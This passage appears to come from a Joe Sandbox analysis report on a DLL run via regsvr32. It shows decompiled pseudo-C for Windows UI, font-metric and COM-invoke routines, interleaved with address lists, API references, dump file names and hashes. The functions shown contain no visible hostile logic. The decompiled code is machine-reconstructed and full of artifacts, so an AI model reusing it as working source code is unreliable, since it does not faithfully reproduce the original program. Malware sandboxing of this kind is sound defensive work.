				_push(GetSystemMenu( *(_t140 + 0x20), 0));
				_t136 = E1001E527(0, _t103, _t135, _t140, _t154);
				if(_t136 != 0) {
					L1000140B(_t152 + 0x18, E100184C0());
					 *((intOrPtr*)(_t152 + 0x34)) = 0;
					L10001276(_t152 + 0x18, 0x65);
					if( *((intOrPtr*)( *(_t152 + 0x14) - 0xc)) != 0) {
						AppendMenuA( *(_t136 + 4), 0x800, 0, 0);
						AppendMenuA( *(_t136 + 4), 0, 0x10,  *(_t152 + 0x14));
					}
					 *(_t152 + 0x30) =  *(_t152 + 0x30) | 0xffffffff;
					_t157 =  &(( *(_t152 + 0x14))[0xfffffffffffffff0]);
					L100013E3( &(( *(_t152 + 0x14))[0xfffffffffffffff0]), _t133);
				}
				_t137 = SendMessageA;
				SendMessageA( *(_t140 + 0x20), 0x80, 1,  *(_t140 + 0x358));
				SendMessageA( *(_t140 + 0x20), 0x80, 0,  *(_t140 + 0x358));
				E1000F61B(_t140 + 0x148, 0, 0xff);
				L1000100A(0, _t140 + 0x148, _t133, SendMessageA, 0x80, _t157, 0x80);
				L10001140(0, _t140 + 0x148, _t133, 0x80, E1001768F(_t140, 0x3ed));
				L100011F9(0, _t140 + 0x148, SendMessageA, _t140, _t157);
				SendMessageA( *(_t140 + 0x168), 0x414, 0x10, 0);
				SendMessageA( *(_t140 + 0x168), 0x415, 0, 0x20);
				E1000F61B(_t140 + 0x250, 0, 0xff);
				L1000100A(0, _t140 + 0x250, _t133, SendMessageA, 0x80, _t157, 0x80);
				L10001140(0, _t140 + 0x250, _t133, 0x80, E1001768F(_t140, 0x3ee));
				L100011F9(0, _t140 + 0x250, _t137, _t140, _t157);
				SendMessageA( *(_t140 + 0x270), 0x414, 0x10, 0);
				SendMessageA( *(_t140 + 0x270), 0x415, 0, 0x20);
				E1000F61B(_t140 + 0x2d4, 0, 0xff);
				_t144 = _t140 + 0x2d4;
				L1000100A(0, _t140 + 0x2d4, _t133, _t137, _t140 + 0x2d4, _t157, 0x80);
				L10001140(0, _t144, _t133, _t144, E1001768F(_t140, 0x3ef));
				L100011F9(0, _t144, _t137, _t140, _t157);
				_t145 = _t140 + 0x2f4;
				SendMessageA( *_t145, 0x414, 0x10, 0);
				SendMessageA( *_t145, 0x415, 0, 0x20);
				_t146 = _t140 + 0x1cc;
				E1000F61B(_t140 + 0x1cc, 0, 0xf0);
				L1000100A(0, _t140 + 0x1cc, _t133, _t137, _t146, _t157, 0x78);
				L10001140(0, _t146, _t133, _t146, E1001768F(_t140, 0x3f0));
				L100011F9(0, _t146, _t137, _t140, _t157);
				_t147 = _t140 + 0x1ec;
				SendMessageA( *_t147, 0x414, 0xc, 0);
				SendMessageA( *_t147, 0x415, 0, 0x18);
				_t148 = E1001768F(_t140, 0x3e8);
				GetClientRect( *(_t148 + 0x20), _t152 + 0x18);
				L100014F6(_t148, _t140, _t152 + 0x18);
				 *((intOrPtr*)( *((intOrPtr*)(_t140 + 0x7c)) + 0x54))(0, "Spectrum", 0x50000000, _t152 + 0x24, _t140, 0x1245, 0, 0xc0c0c0, 0, 0xe35b5b, 0, 0x5be35b, 0, 0x5b5be3, 0);
				SendMessageA( *(_t148 + 0x20), 0x10, 0, 0);
				PostMessageA( *(_t140 + 0x20), 0x115, 0,  *(_t140 + 0x168));
				 *[fs:0x0] =  *((intOrPtr*)(_t152 + 0x28));
				return 1;
			}



















                                                                                                                0x10001069
                                                                                                                0x10001069
                                                                                                                0x10001069
                                                                                                                0x10008510
                                                                                                                0x10008512
                                                                                                                0x1000851d
                                                                                                                0x1000851e
                                                                                                                0x10008524
                                                                                                                0x10008525
                                                                                                                0x1000852c
                                                                                                                0x10008531
                                                                                                                0x10008537
                                                                                                                0x10008539
                                                                                                                0x1000854a
                                                                                                                0x10008550
                                                                                                                0x10008554
                                                                                                                0x10008560
                                                                                                                0x1000856b
                                                                                                                0x1000856f
                                                                                                                0x1000857b
                                                                                                                0x1000858d
                                                                                                                0x10008599
                                                                                                                0x10008599
                                                                                                                0x1000859f
                                                                                                                0x100085a4
                                                                                                                0x100085a7
                                                                                                                0x100085a7
                                                                                                                0x100085b2
                                                                                                                0x100085c3
                                                                                                                0x100085d0
                                                                                                                0x100085df
                                                                                                                0x100085eb
                                                                                                                0x10008603
                                                                                                                0x10008613
                                                                                                                0x10008626
                                                                                                                0x10008636
                                                                                                                0x10008645
                                                                                                                0x10008651
                                                                                                                0x10008669
                                                                                                                0x10008679
                                                                                                                0x1000868c
                                                                                                                0x1000869c
                                                                                                                0x100086ab
                                                                                                                0x100086b1
                                                                                                                0x100086b9
                                                                                                                0x100086cd
                                                                                                                0x100086d9
                                                                                                                0x100086e6
                                                                                                                0x100086ef
                                                                                                                0x100086fc
                                                                                                                0x10008704
                                                                                                                0x1000870d
                                                                                                                0x10008716
                                                                                                                0x1000872a
                                                                                                                0x10008736
                                                                                                                0x10008743
                                                                                                                0x1000874c
                                                                                                                0x10008759
                                                                                                                0x10008767
                                                                                                                0x10008771
                                                                                                                0x1000877f
                                                                                                                0x100087a0
                                                                                                                0x100087aa
                                                                                                                0x100087bb
                                                                                                                0x100087c8
                                                                                                                0x100087d7

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$Menu$Append$ClientPostRectSystem
                                                                                                                • String ID: Spectrum
                                                                                                                • API String ID: 2066304807-103510960
                                                                                                                • Opcode ID: b5cc9c2296e574058509840be55fbeef93d50fa0541e700fa9086c0337b757a2
                                                                                                                • Instruction ID: e2de74c3c2d5a4a58301f47727eb28d82eb25700d7cd5afd40f373a8dffbfa27
                                                                                                                • Opcode Fuzzy Hash: b5cc9c2296e574058509840be55fbeef93d50fa0541e700fa9086c0337b757a2
                                                                                                                • Instruction Fuzzy Hash: 44718F75240B48BFE625EB20CC86FEF77ADFF84784F000928B25A561E2DA71BD448B14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002A272 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 109COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E1002A272(void* __ecx, void* __eflags, intOrPtr _a4, signed short _a8, int _a12, int _a16, intOrPtr* _a20) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				struct HDC__* _v72;
				int _v76;
				void* _v80;
				void* _v84;
				intOrPtr* _v88;
				struct tagSIZE _v96;
				struct tagTEXTMETRICA _v152;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t41;
				int _t46;
				void* _t54;
				signed int _t69;
				int _t76;
				void* _t77;
				signed int _t81;
				signed int _t82;
				void* _t83;
				intOrPtr* _t85;
				signed int _t87;

				_t77 = __ecx;
				_t41 =  *0x100b9e70; // 0xbb35530
				_v8 = _t41 ^ _t87;
				_t85 = _a20;
				_v88 = _t85;
				_v72 = GetDC(0);
				E10049170(_t83,  &_v68, 0, 0x3c);
				_t46 = GetDeviceCaps(_v72, 0x5a);
				_t84 = MulDiv;
				_v68.lfHeight =  ~(MulDiv(_a8 & 0x0000ffff, _t46, 0x48));
				_v68.lfWeight = 0x190;
				_v68.lfCharSet = 1;
				_push(L10048E92( &(_v68.lfFaceName), 0x20, _a4, 0xffffffff));
				L1000135C(_a4, _t77, MulDiv, _t85);
				_t54 = CreateFontIndirectA( &_v68);
				_v80 = _t54;
				if(_t54 == 0) {
					_v76 = GetDialogBaseUnits() & 0x0000ffff;
					_t76 = GetDialogBaseUnits() >> 0x10;
				} else {
					_v84 = SelectObject(_v72, _t54);
					GetTextMetricsA(_v72,  &_v152);
					_t76 = _v152.tmExternalLeading + _v152.tmHeight;
					GetTextExtentPoint32A(_v72, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz", 0x34,  &_v96);
					_t69 = _v96.cx + 0x1a;
					_t81 = 0x34;
					asm("cdq");
					_t82 = _t69 % _t81;
					_v76 = _t69 / _t81;
					SelectObject(_v72, _v84);
					DeleteObject(_v80);
					_t85 = _v88;
				}
				ReleaseDC(0, _v72);
				 *_t85 = MulDiv(_a12, _v76, 4);
				 *((intOrPtr*)(_t85 + 4)) = MulDiv(_a16, _t76, 8);
				return E1004763E(_t60, _t76, _v8 ^ _t87, _t82, _t84, _t85);
			}



























                                                                                                                0x1002a272
                                                                                                                0x1002a27b
                                                                                                                0x1002a282
                                                                                                                0x1002a28a
                                                                                                                0x1002a290
                                                                                                                0x1002a29b
                                                                                                                0x1002a2a4
                                                                                                                0x1002a2b3
                                                                                                                0x1002a2b9
                                                                                                                0x1002a2cc
                                                                                                                0x1002a2d5
                                                                                                                0x1002a2dc
                                                                                                                0x1002a2e5
                                                                                                                0x1002a2e6
                                                                                                                0x1002a2f2
                                                                                                                0x1002a2fa
                                                                                                                0x1002a2fd
                                                                                                                0x1002a371
                                                                                                                0x1002a378
                                                                                                                0x1002a2ff
                                                                                                                0x1002a30b
                                                                                                                0x1002a318
                                                                                                                0x1002a32a
                                                                                                                0x1002a33b
                                                                                                                0x1002a344
                                                                                                                0x1002a349
                                                                                                                0x1002a34a
                                                                                                                0x1002a34b
                                                                                                                0x1002a353
                                                                                                                0x1002a356
                                                                                                                0x1002a35b
                                                                                                                0x1002a361
                                                                                                                0x1002a361
                                                                                                                0x1002a380
                                                                                                                0x1002a396
                                                                                                                0x1002a39e
                                                                                                                0x1002a3ab

                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 1002A293
                                                                                                                • _memset.LIBCMT ref: 1002A2A4
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1002A2B3
                                                                                                                • MulDiv.KERNEL32 ref: 1002A2C5
                                                                                                                • _wctomb_s.LIBCMT ref: 1002A2E0
                                                                                                                  • Part of subcall function 10048E92: __mbsnbcpy_s_l.LIBCMT ref: 10048EA4
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 1002A2F2
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 1002A309
                                                                                                                • GetTextMetricsA.GDI32(?,?), ref: 1002A318
                                                                                                                • GetTextExtentPoint32A.GDI32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,?), ref: 1002A33B
                                                                                                                • SelectObject.GDI32(?,?), ref: 1002A356
                                                                                                                • DeleteObject.GDI32(?), ref: 1002A35B
                                                                                                                • GetDialogBaseUnits.USER32 ref: 1002A36C
                                                                                                                • GetDialogBaseUnits.USER32 ref: 1002A374
                                                                                                                • ReleaseDC.USER32(00000000,?), ref: 1002A380
                                                                                                                • MulDiv.KERNEL32 ref: 1002A38E
                                                                                                                • MulDiv.KERNEL32 ref: 1002A398
                                                                                                                Strings
                                                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 1002A333
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$BaseDialogSelectTextUnits$CapsCreateDeleteDeviceExtentFontIndirectMetricsPoint32Release__mbsnbcpy_s_l_memset_wctomb_s
                                                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                                • API String ID: 332251102-222967699
                                                                                                                • Opcode ID: 384aeabfd8e3c82378f84a014e930b819d84851ea08dbeaf13ef1bf8bab1445e
                                                                                                                • Instruction ID: b41e73f3cd40d0cf8ebef9bcd289606718180d74c28e02b965907366521e4e5e
                                                                                                                • Opcode Fuzzy Hash: 384aeabfd8e3c82378f84a014e930b819d84851ea08dbeaf13ef1bf8bab1445e
                                                                                                                • Instruction Fuzzy Hash: 334127B1D00218AFEF10DFE4CD89ADEBBB9FF09700F104056F606A62A1DB75AA11CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003B427 Relevance: 28.9, APIs: 19, Instructions: 423stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 46%
                                                                                                                			E1003B427(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E1004764D(0x100910c1, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E10047725(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10049170(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x1009ee28;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
					L37:
					_t295 = 0;
					E100235FF(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10049170(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x100a47bc, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1003B344(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10009F3F(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E10039D98(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10009F3F(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1003B9B7))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = L10020F02(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E1000A8F5(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E10009F14(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1003A708(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								L1000AF5E(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								L1000AF5E(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								L1000AF5E(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							L10048E48(_t300 + 0x14, 0x100b4864);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E10009F14(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10049170(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1003B96B))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E10039728(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E10039E62(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10009F3F(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1003B91B))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E1000B9D2(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = L100013E3(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E1000A035(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}































                                                                                                                0x1003b427
                                                                                                                0x1003b42e
                                                                                                                0x1003b433
                                                                                                                0x1003b436
                                                                                                                0x1003b43a
                                                                                                                0x1003b913
                                                                                                                0x1003b918
                                                                                                                0x1003b918
                                                                                                                0x1003b440
                                                                                                                0x1003b443
                                                                                                                0x1003b446
                                                                                                                0x1003b449
                                                                                                                0x1003b453
                                                                                                                0x1003b456
                                                                                                                0x1003b45b
                                                                                                                0x1003b461
                                                                                                                0x1003b46c
                                                                                                                0x1003b46c
                                                                                                                0x1003b473
                                                                                                                0x1003b47a
